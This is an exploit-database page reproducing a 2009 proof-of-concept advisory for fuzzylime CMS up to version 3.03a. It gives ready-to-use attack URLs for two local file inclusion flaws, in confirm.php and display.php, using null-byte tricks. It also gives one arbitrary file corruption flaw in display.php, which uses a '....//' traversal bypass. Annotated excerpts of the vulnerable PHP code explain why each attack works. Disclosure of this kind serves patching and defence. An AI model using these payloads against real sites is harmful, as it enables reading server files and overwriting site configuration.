header-logo
Suggest Exploit
vendor:
fuzzylime cms
by:
staker
N/A
CVSS
N/A
local file inclusion / arbitrary file corruption
CWE
Product Name: fuzzylime cms
Affected Version From: Unknown
Affected Version To: 3.03a
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc

There are three vulnerabilities in the fuzzylime cms version <= 3.03a. The first vulnerability (LFI) can be exploited by accessing the confirm.php file and using the 'e' and 'list' parameters to include arbitrary files. The second vulnerability (LFI) can be exploited by accessing the display.php file and using the 'template' parameter to include arbitrary files. The third vulnerability (LFC) can be exploited by accessing the display.php file and using the 'usecache' and 's' parameters to corrupt local files.

Mitigation:

Unknown
Source

Exploit-DB raw data:

+------------------------------------------------------------------------+
| fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc |
+-----------+------------------------------------------------------------+
| by staker | 
+-----------+---------------------+
| mail: staker[at]hotmail[dot]it  |
| url: http://cms.fuzzylime.co.uk |
+---------------------------------+    


[1][LFI]

http://[target]/[path]/code/confirm.php?e[]&list= { file + nullbyte }

Vulnerable code: confirm.php (local file inclusion mq=off)
-----------------------------------------------------------------
 1. <?
 2. @extract($HTTP_GET_VARS);  <-------- {1} 
 3. @extract($_GET);           <----------^
      
27.  elseif(isset($e)) { <------- {2}
28.       $filename = "code/mailing/$list.inc.php"; <------- {3}
29.        @include $filename; <------- {4}
-----------------------------------------------------------------
1. extract() allows to overwrite any not-defined variable via get  
   therefore it works regardless of register_globals settings.
       
2. $e is a variable not defined,therefore become $_GET['e']     
3. $list is a variable not defined,therefore become $_GET['list']
4. $filename contains $list variable that will be required
-----------------------------------------------------------------


[2][LFI]

http://[target]/[path]/code/display.php?template= {file + nullbyte}

Vulnerable code: display.php (local file inclusion mq=0 & reg=on)
--------------------------------------------------------------------
98. if($_GET['print'] != "1") include "templates/${template}_f.php";
--------------------------------------------------------------------




[3][LFC]

http://[target]/[path]/code/display.php?usecache=1&s=....//settings 
http://[target]/[path]/code/display.php?usecache=1&s={file + nullbyte}(mq = off)

Vulnerable code: display.php (local file corruption register_gl=1)
-----------------------------------------------------------------
  1. <?
  2. $s = $_GET[s];
  3. $p = $_GET[p];
  4. $s = str_replace("../", "", $s); <---------- {1}
  5. $p = str_replace("../", "", $p);
 ...
 54. $cachefile = "cache/${s}_${p}_$_GET[m]_$_GET[c]_$_GET[t]_$_GET[u]_$_GET[print].cache.htm"; <---- {2}
100. if($usecache == "1" && $passprot != "1" && $s != "rss" && empty($_GET[msg]) && empty($_GET[tn])) { <--- {3}
101.		if($handle = fopen($cachefile, 'w')) { // Create the cache file <-------- {4}
102.			$output = ob_get_contents();
103.			fputs($handle, $output); 
104.
105.			fclose($handle); 
106.		} 
107.	}
----------------------------------------------------------------------
1. you have to use ....// to change directory because of 1st point. so
   ....// will be ../
2. $cachefile contains $s variable
3. if $usecache == 1 we will go ahead
4. you will overwrite a file typing the name via $s variable.
-----------------------------------------------------------------------  

[x] http://www.youtube.com/watch?v=h3DQmJOkSY0

# milw0rm.com [2009-06-17]

Navigation

Suggest Exploit

Services By CQR